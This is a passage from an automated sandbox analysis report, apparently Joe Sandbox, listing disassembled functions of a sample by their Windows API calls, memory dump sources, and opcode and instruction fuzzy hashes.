                                                                                                                                    • Instruction Fuzzy Hash: BDF08C322003169F8F13AEA8EC0099A77A9BF01F207104165FA06E6290DB31EA20C790
                                                                                                                                    APIs
                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0038CA2C,00000000,?,00386CBE,?,00000008,?,003891E0,?,?,?), ref: 00388E38
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                    • Opcode ID: 237a8f6fad5adb7fb3fe525934aff5f7fed5769d379b9fbcd3ca70d497dc0066
                                                                                                                                    • Instruction ID: cd6b4acd31763c7ea857ba89a8a5af2a60ae2aaa5d952c7de696a99f0ea06c30
                                                                                                                                    • Opcode Fuzzy Hash: 237a8f6fad5adb7fb3fe525934aff5f7fed5769d379b9fbcd3ca70d497dc0066
                                                                                                                                    • Instruction Fuzzy Hash: F9E0ED3124672556EA7337719C09BAB768C9F813A0FA601E1BC089A491CF60ED0083E0
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00365AC2
                                                                                                                                      • Part of subcall function 0036B505: __EH_prolog.LIBCMT ref: 0036B50A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: H_prolog
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                    • Opcode ID: bea5cc7587689a2a313d846f7dfd0a9060474db9351ecd242cd1c712a742f474
                                                                                                                                    • Instruction ID: 57686d49781795d4acdf08ef2f55a61fa712c4e158372675656baec87a30fd47
                                                                                                                                    • Opcode Fuzzy Hash: bea5cc7587689a2a313d846f7dfd0a9060474db9351ecd242cd1c712a742f474
                                                                                                                                    • Instruction Fuzzy Hash: E801A430410790DAD72AE7B8C0517DDFBE4DF59304F50C48DA45A57283CBB81B08D7A2
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0036A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6C4
                                                                                                                                      • Part of subcall function 0036A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6F2
                                                                                                                                      • Part of subcall function 0036A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6FE
                                                                                                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0036A598
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1464966427-0
                                                                                                                                    • Opcode ID: 62008fa809db5e9b3e560e4cd27b9b9239b5c73c837898fb86060b9175160412
                                                                                                                                    • Instruction ID: 96d459b21b0f48c66d31e0d159c861ba29f18859239c04a427e9dae86f86f089
                                                                                                                                    • Opcode Fuzzy Hash: 62008fa809db5e9b3e560e4cd27b9b9239b5c73c837898fb86060b9175160412
                                                                                                                                    • Instruction Fuzzy Hash: DEF05431008B90AACA2367B489047C7BB945F17321F04CA4DF1FA6619AC26550989F23
                                                                                                                                    APIs
                                                                                                                                    • SetThreadExecutionState.KERNEL32(00000001), ref: 00370E3D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2211380416-0
                                                                                                                                    • Opcode ID: 649d1f7145e353e67988b700c6165bad83ba1a1bc1ca5d9ea8ce7a4209b41989
                                                                                                                                    • Instruction ID: 7d4a6f3cfffe9baf89a15e1b53113ef8aaccb58b1d3b3344e5429f1179e87102
                                                                                                                                    • Opcode Fuzzy Hash: 649d1f7145e353e67988b700c6165bad83ba1a1bc1ca5d9ea8ce7a4209b41989
                                                                                                                                    • Instruction Fuzzy Hash: 95D0121560145456DA37732C68567FE350A8FC7351F0D8066B14D6F686CA5D4886A261
                                                                                                                                    APIs
                                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 0037A62C
                                                                                                                                      • Part of subcall function 0037A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0037A3DA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1915507550-0
                                                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                    • Instruction ID: e0e7f04f156f40a62237deca0e83a9142f32b0b418472d496327d8b291e1416f
                                                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                    • Instruction Fuzzy Hash: 59D0C97121460DBAEF636F618C1296E7A99EB80340F04C125B84AD9191EAB9DA10EA62
                                                                                                                                    APIs
                                                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00371B3E), ref: 0037DD92
                                                                                                                                      • Part of subcall function 0037B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0037B579
                                                                                                                                      • Part of subcall function 0037B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B58A
                                                                                                                                      • Part of subcall function 0037B568: IsDialogMessageW.USER32(00010474,?), ref: 0037B59E
                                                                                                                                      • Part of subcall function 0037B568: TranslateMessage.USER32(?), ref: 0037B5AC
                                                                                                                                      • Part of subcall function 0037B568: DispatchMessageW.USER32(?), ref: 0037B5B6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 897784432-0
                                                                                                                                    • Opcode ID: f81001ffba6b69d1e3495b76a11083cbd1e0343fd34206a3c7b7964a0f2abecd
                                                                                                                                    • Instruction ID: ee75ec9fc387abbba984c31d28b872dda9580f5d552919ba45765d3779911914
                                                                                                                                    • Opcode Fuzzy Hash: f81001ffba6b69d1e3495b76a11083cbd1e0343fd34206a3c7b7964a0f2abecd
                                                                                                                                    • Instruction Fuzzy Hash: FED09E32144300BAD6132B51CD06F0E7AB6AB89B08F008954B288740B1CA72AD31DB11
                                                                                                                                    APIs
                                                                                                                                    • DloadProtectSection.DELAYIMP ref: 0037E5E3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DloadProtectSection
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2203082970-0
                                                                                                                                    • Opcode ID: e5e703795cf0b92d2e19c9803f2a33deb7ac73c832d9e55612018fc87ae3a20c
                                                                                                                                    • Instruction ID: 4deacd0ad87eb9b31513ee87a51207aa9280bf6a8f12d191f6868a588fb53902
                                                                                                                                    • Opcode Fuzzy Hash: e5e703795cf0b92d2e19c9803f2a33deb7ac73c832d9e55612018fc87ae3a20c
                                                                                                                                    • Instruction Fuzzy Hash: 18D0C9B01802809AD637EBA89886B583258BB2EB14F94C1A5F14DD9492DA6C9491E70A
                                                                                                                                    APIs
                                                                                                                                    • GetFileType.KERNELBASE(000000FF,003697BE), ref: 003698C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileType
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3081899298-0
                                                                                                                                    • Opcode ID: faf13b29c46973c610e14ea82d909ee8beaf14403884cbb7be8a265d890fb8b5
                                                                                                                                    • Instruction ID: 9268aa04dce8aef46cdbc0d17eb6373e4d9e4a5353dc4f1f7188a11b2fae682c
                                                                                                                                    • Opcode Fuzzy Hash: faf13b29c46973c610e14ea82d909ee8beaf14403884cbb7be8a265d890fb8b5
                                                                                                                                    • Instruction Fuzzy Hash: 16C01238400205C68E228B249848199736AAA533A6BB5E696C029CA0A5C333CC8BEA01
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                    • Opcode ID: 0ee3abfbd5ddfbc5fbf199cf78f21faf9c2bc3d97cd3c444a7cdcdabdc633e5f
                                                                                                                                    • Instruction ID: 7529d0dffd46a62389348039ad443c5b1ce1aa613dea6cc21d3da9c239d63c93
                                                                                                                                    • Opcode Fuzzy Hash: 0ee3abfbd5ddfbc5fbf199cf78f21faf9c2bc3d97cd3c444a7cdcdabdc633e5f
                                                                                                                                    • Instruction Fuzzy Hash: F9B012FB268010FC3217E1051C02E37021CC0C8F10330D06EF82DC5480D8484E000533
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                    • Opcode ID: ac6ddc181702ec9f67fbf0508d06203bf6fa4462bbbd4bf0480ec6f6afb7f7b5
                                                                                                                                    • Instruction ID: da0bbaa1a40f37d6217a6179d1184094eb5a2d79eab332ef431174c10b935ce0
                                                                                                                                    • Opcode Fuzzy Hash: ac6ddc181702ec9f67fbf0508d06203bf6fa4462bbbd4bf0480ec6f6afb7f7b5
                                                                                                                                    • Instruction Fuzzy Hash: 72B012EA268010BC3217A1051D02E77021CC4C8F10330D06EF52DC5480D8440C091533
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                    • Opcode ID: f1d293d8473448eee4950b32f88101ed63ca51bc9a9d5017a1dc44b909bada40
                                                                                                                                    • Instruction ID: 1699ad4d8e104d9d64864efc4099f0391224a0759725872bc580d1fd22714bde
                                                                                                                                    • Opcode Fuzzy Hash: f1d293d8473448eee4950b32f88101ed63ca51bc9a9d5017a1dc44b909bada40
                                                                                                                                    • Instruction Fuzzy Hash: 0FB012EA268010FC3217F1051C02E37021CC4C8F10330D06FF82DC5480D8444C040533
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                    • Opcode ID: b26eebfd5da2e3ef73c133ec161babc5d2fdf98d7e3f721e70a1f52dd4b90ea1
                                                                                                                                    • Instruction ID: 683c8d6bee50e68af8d3547c10a50b34d8b423ba5145ef82c14128f8e43bd59c
                                                                                                                                    • Opcode Fuzzy Hash: b26eebfd5da2e3ef73c133ec161babc5d2fdf98d7e3f721e70a1f52dd4b90ea1
                                                                                                                                    • Instruction Fuzzy Hash: 94A002FA2B9152BD362BA2526D07D7B032DC4C9F25334E5AEF83DE98C1AD881C451873
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                    • Opcode ID: 230bbc1ffeec47b69a95a47cd9392f1f28eeb2258608b933bf066c4c111fe5c6
                                                                                                                                    • Instruction ID: 4d3bf34066a9e3b5b587f8fb058dc77f23aa080915473d566c7a8857e5f5371d
                                                                                                                                    • Opcode Fuzzy Hash: 230bbc1ffeec47b69a95a47cd9392f1f28eeb2258608b933bf066c4c111fe5c6
                                                                                                                                    • Instruction Fuzzy Hash: 76A002E5169151BC351651515D06D77021DC4C9F51334D55DF42995481594418451473
                                                                                                                                    APIs
                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0037E3FC
                                                                                                                                      • Part of subcall function 0037E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0037E8D0
                                                                                                                                      • Part of subcall function 0037E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0037E8E1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
